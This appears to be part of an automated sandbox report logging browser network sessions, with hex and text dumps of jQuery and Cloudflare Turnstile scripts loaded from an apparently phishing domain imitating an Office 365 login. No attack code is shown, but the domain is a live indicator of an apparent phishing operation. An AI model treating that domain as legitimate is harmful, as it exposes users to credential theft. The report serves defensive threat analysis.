                                                          2025-01-09 20:12:14 UTC1369INData Raw: 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c
                                                          Data Ascii: ]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449744104.18.95.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:14 UTC655OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://cesinc365.xemitronax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:14 UTC386INHTTP/1.1 302 Found
                                                          Date: Thu, 09 Jan 2025 20:12:14 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                          cross-origin-resource-policy: cross-origin
                                                          location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714c07bc2187d-EWR
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.449743151.101.130.1374436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:14 UTC629OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                          Host: code.jquery.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://cesinc365.xemitronax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:14 UTC613INHTTP/1.1 200 OK
                                                          Connection: close
                                                          Content-Length: 89501
                                                          Server: nginx
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                          ETag: "28feccc0-15d9d"
                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Via: 1.1 varnish, 1.1 varnish
                                                          Accept-Ranges: bytes
                                                          Date: Thu, 09 Jan 2025 20:12:14 GMT
                                                          Age: 1938061
                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740051-EWR
                                                          X-Cache: HIT, HIT
                                                          X-Cache-Hits: 2774, 2
                                                          X-Timer: S1736453535.800118,VS0,VE0
                                                          Vary: Accept-Encoding
                                                          2025-01-09 20:12:14 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                          2025-01-09 20:12:14 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                          Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                          2025-01-09 20:12:14 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                          Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                          2025-01-09 20:12:15 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                          Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                          2025-01-09 20:12:15 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                          Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                          2025-01-09 20:12:15 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                          Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.449747104.18.95.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:15 UTC654OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://cesinc365.xemitronax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:15 UTC471INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:15 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 47521
                                                          Connection: close
                                                          accept-ranges: bytes
                                                          last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                          access-control-allow-origin: *
                                                          cross-origin-resource-policy: cross-origin
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714c43dd07c6a-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:15 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                          Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                          Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                          Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                          Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                          Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
